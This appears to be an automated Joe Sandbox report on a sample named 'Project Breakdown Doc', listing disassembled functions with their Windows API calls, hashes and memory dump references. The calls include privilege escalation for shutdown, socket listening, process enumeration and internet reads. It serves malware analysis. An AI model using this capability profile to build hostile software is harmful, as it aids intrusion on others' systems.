                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: 03e620b7ef43525dbaefb61d24eee2c71fadb135f3ae255d67cc46c0c2c59e0e
                                                  • Instruction ID: 21fcca184d48644f5f11587e655c3a9dccabad5ee69d9ff499c80b0dca3ae7d8
                                                  • Opcode Fuzzy Hash: 03e620b7ef43525dbaefb61d24eee2c71fadb135f3ae255d67cc46c0c2c59e0e
                                                  • Instruction Fuzzy Hash: 4B41817190021A9FCF51DFA4CC89EEEBBB4FF06314F14456AE815A31A1DB309E45DB90
                                                  Function 00C54140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                  • API String ID: 0-1546025612
                                                  • Opcode ID: 8b5703ac65831cf7b56fdb68a7f33a520483961d859c4ddadc8b57c80a8044b4
                                                  • Instruction ID: 59c609db8fa37405b323a03bea680003e249a154621a5b5f7f7da4e794d027b5
                                                  • Opcode Fuzzy Hash: 8b5703ac65831cf7b56fdb68a7f33a520483961d859c4ddadc8b57c80a8044b4
                                                  • Instruction Fuzzy Hash: 65A2B374D0421ACBDF28DF59C9807ADB7B1BF54319F2482A9DC25A7280E7309EC9DB58
                                                  Function 00C558C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 3c91292b5e4a92af41a561590d88f0082b1229b4a22d15466b8b63db611b2c0b
                                                  • Instruction ID: 25cfe53cdd27668984a034ef859a2b6c818d78f83d69076fa89fabdaff116444
                                                  • Opcode Fuzzy Hash: 3c91292b5e4a92af41a561590d88f0082b1229b4a22d15466b8b63db611b2c0b
                                                  • Instruction Fuzzy Hash: 0912CA70A00609EFCF14DFA5D995AAEB3F5FF48300F204229E806E7291EB35AE55DB54
                                                  Function 00CA545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C98CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C98D0D
                                                    • Part of subcall function 00C98CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C98D3A
                                                    • Part of subcall function 00C98CC3: GetLastError.KERNEL32 ref: 00C98D47
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00CA549B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 724fab79a7d59232308648269ba98cbe205c2d82040c4367f818d2596401bb09
                                                  • Instruction ID: 08f7c093cf274bdfb4f8ff8898b86c07c9e579d7926e269d9622a4576613aec8
                                                  • Opcode Fuzzy Hash: 724fab79a7d59232308648269ba98cbe205c2d82040c4367f818d2596401bb09
                                                  • Instruction Fuzzy Hash: 58014732654A072AE7285378EC4AFBA7258EB0F356F208034FD16E20D2DA500D8081A0
                                                  Function 00CB6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CB65EF
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB65FE
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00CB661A
                                                  • listen.WSOCK32(00000000,00000005), ref: 00CB6629
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6643
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00CB6657
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 661d123748f617d921fa23b8ff7ef576da6e98a51b8ff7839539ae0946e9f9fc
                                                  • Instruction ID: 988c1e582a5073af34732e4ab5d97d418279982792258fa8a5b6f5d0afc81fe2
                                                  • Opcode Fuzzy Hash: 661d123748f617d921fa23b8ff7ef576da6e98a51b8ff7839539ae0946e9f9fc
                                                  • Instruction Fuzzy Hash: 7D21A0306002149FCB10EF64C889FAEB7AAEF45320F148159F966E73D1CB74AD02DB51
                                                  Function 00C55680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                  • _memmove.LIBCMT ref: 00C9062F
                                                  • _memmove.LIBCMT ref: 00C90744
                                                  • _memmove.LIBCMT ref: 00C907EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: 5c04b0a13c36175940ac6f8aed066d5786a8ee62c79f15167c26b56dbf32b3e8
                                                  • Instruction ID: d18373eae9ee307c1df0129a07c6f4ac353555a36780ece4414f85e32429ba9c
                                                  • Opcode Fuzzy Hash: 5c04b0a13c36175940ac6f8aed066d5786a8ee62c79f15167c26b56dbf32b3e8
                                                  • Instruction Fuzzy Hash: C702DFB0E00209DFCF04DF64D995AAEBBB5FF44300F2480A9E806DB295EB31DA55DB95
                                                  Function 00C41287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C419FA
                                                  • GetSysColor.USER32(0000000F), ref: 00C41A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00C41A61
                                                    • Part of subcall function 00C41290: DefDlgProcW.USER32(?,00000020,?), ref: 00C412D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: 924c5d2358ff2480c75bb517be06624662f4ff0d6cb0254c8afe68baffb84499
                                                  • Instruction ID: a86d247054faedb797c6099dd1e8c19971024943483b0191205a6ed64458f893
                                                  • Opcode Fuzzy Hash: 924c5d2358ff2480c75bb517be06624662f4ff0d6cb0254c8afe68baffb84499
                                                  • Instruction Fuzzy Hash: C7A15B71101544BFD628AF2A8C99FBF39ADFB41345B1C8119FCA6D61D1CE20CE81B2B5
                                                  Function 00CB6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00CB80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB80CB
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CB6AB1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6ADA
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00CB6B13
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6B20
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00CB6B34
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 6992e12cf6db6c80b4518ca5da9c4b167d7d4c0bfd452d4844af387fe2b95f6e
                                                  • Instruction ID: 25f72f3b91e33f70f4f7a5f97bc4f94e1e696252bb51d94ef7c25c24df8052c9
                                                  • Opcode Fuzzy Hash: 6992e12cf6db6c80b4518ca5da9c4b167d7d4c0bfd452d4844af387fe2b95f6e
                                                  • Instruction Fuzzy Hash: 5541B375B00220AFEB10BF24DC86F6E77A9EB45710F04805CF95AAB3D2DB749D01A791
                                                  Function 00CC55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: ac720b63600681e9350a1915a299b76a13b30b3b404bac2006da4b5cf5bdc257
                                                  • Instruction ID: 3076457222fd88e05a2c3790c0bda74df81c847d74fd49b95b43de7f153ab9cf
                                                  • Opcode Fuzzy Hash: ac720b63600681e9350a1915a299b76a13b30b3b404bac2006da4b5cf5bdc257
                                                  • Instruction Fuzzy Hash: D611BF32300A206FE7216F26DC44F6FBB99FF54721B84442DF856D7341CB70EA829AA5
                                                  Function 00CBC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C81D88,?), ref: 00CBC312
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CBC324
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                  • API String ID: 2574300362-1816364905
                                                  • Opcode ID: 53d6f5b5fbff7f801f889e0ecb98dca7cc360989cc1654eb72f7b3577abf810d
                                                  • Instruction ID: a95280ac539dbabd5558e0f5377659fa3acedeeb70e7170e44d668091a488f25
                                                  • Opcode Fuzzy Hash: 53d6f5b5fbff7f801f889e0ecb98dca7cc360989cc1654eb72f7b3577abf810d
                                                  • Instruction Fuzzy Hash: 66E0ECB4600713CFDB204B25D854FDA76D4EB08755F84C43DE8AAD6260E770D981CA60
                                                  Function 00C53190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: 39577a2062ac8090586890e3ca6ee6b43210676ae017b9f22fb744bafada4c40
                                                  • Instruction ID: 9c25876f66acd0df23504ce311e144ba8ceac82adcd0cc03960fb5dcea705432
                                                  • Opcode Fuzzy Hash: 39577a2062ac8090586890e3ca6ee6b43210676ae017b9f22fb744bafada4c40
                                                  • Instruction Fuzzy Hash: AB229A756083419FCB24EF24C891B6FB7E4BF84344F10491DF89A97291EB30EA48DB96
                                                  Function 00CBF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00CBF151
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00CBF15F
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00CBF21F
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CBF22E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: 08f94baee0e4b519696c30d60c51c6289db3a56a966d3f6e9445b4a8fb7ebef8
                                                  • Instruction ID: 8b994635dbbdf40f91cd4044ed82f68569f5f3b9e4b114b6f3ea3b6d96448fe1
                                                  • Opcode Fuzzy Hash: 08f94baee0e4b519696c30d60c51c6289db3a56a966d3f6e9445b4a8fb7ebef8
                                                  • Instruction Fuzzy Hash: 65515A71504310AFD310EF24DC85AAFBBE8FF98710F14492DF495962A1EB70AA09DB92
                                                  Function 00CA40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA40D1
                                                  • _memset.LIBCMT ref: 00CA40F2
                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CA4144
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CA414D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                  • String ID:
                                                  • API String ID: 1157408455-0
                                                  • Opcode ID: 5783ffab1845333c344b5eb9db87211cd12257617113356008ed30888c68f828
                                                  • Instruction ID: d9ea10c27fdfc1a50244215f6c4dceb91ae0c23c2f1d9950aa59e8a32ca70cdb
                                                  • Opcode Fuzzy Hash: 5783ffab1845333c344b5eb9db87211cd12257617113356008ed30888c68f828
                                                  • Instruction Fuzzy Hash: FF11E7759012287AD7309BA5AC4DFAFBB7CEF85764F1041AAF908D7180D6744F808BA4
                                                  Function 00C9EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C9EB19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 035f168fd4025a32ed36a9dedf0a1a29f55bae77b05460675f3d8c185420bc4d
                                                  • Instruction ID: 67fb1e46e0029b6bf66bc5cfa8492a7f920f4eed6acb7afceb2965ddcd01e32d
                                                  • Opcode Fuzzy Hash: 035f168fd4025a32ed36a9dedf0a1a29f55bae77b05460675f3d8c185420bc4d
                                                  • Instruction Fuzzy Hash: 8E323675A007059FCB28CF59C485A6AB7F0FF58320B15C46EE8AADB3A1E770E941CB44
                                                  Function 00CB25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CB1AFE,00000000), ref: 00CB26D5
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CB270C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: 18fadf0bc629af530f9288963b9b9373b3e0d20b2fec887acfae252e3c3839b5
                                                  • Instruction ID: c1bbaeed8a556609b974d9755f68393266e2b0c41232e914257ca37b250ceb03
                                                  • Opcode Fuzzy Hash: 18fadf0bc629af530f9288963b9b9373b3e0d20b2fec887acfae252e3c3839b5
                                                  • Instruction Fuzzy Hash: 9341B171A00209BFEB21DF95DCC5FFFB7BCEB40724F10406AFA15A6140EA71AE41A664
                                                  Function 00CAB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAB5AE
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CAB608
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CAB655
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: 8c4d4a172ed87fd2ff01f0dd56145a5d2d3862b3f419b1b937c67de679bace88
                                                  • Instruction ID: 706d4595335f7bcc035d08b56fef892e76d012c9c6f77c97d0900710b24409fc
                                                  • Opcode Fuzzy Hash: 8c4d4a172ed87fd2ff01f0dd56145a5d2d3862b3f419b1b937c67de679bace88
                                                  • Instruction Fuzzy Hash: 0F216D35A00118EFCB00EFA5D884EAEBBB8FF49314F1480A9E905AB351DB31A956DB51
                                                  Function 00C98CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C98D0D
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C98D3A
                                                  • GetLastError.KERNEL32 ref: 00C98D47
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
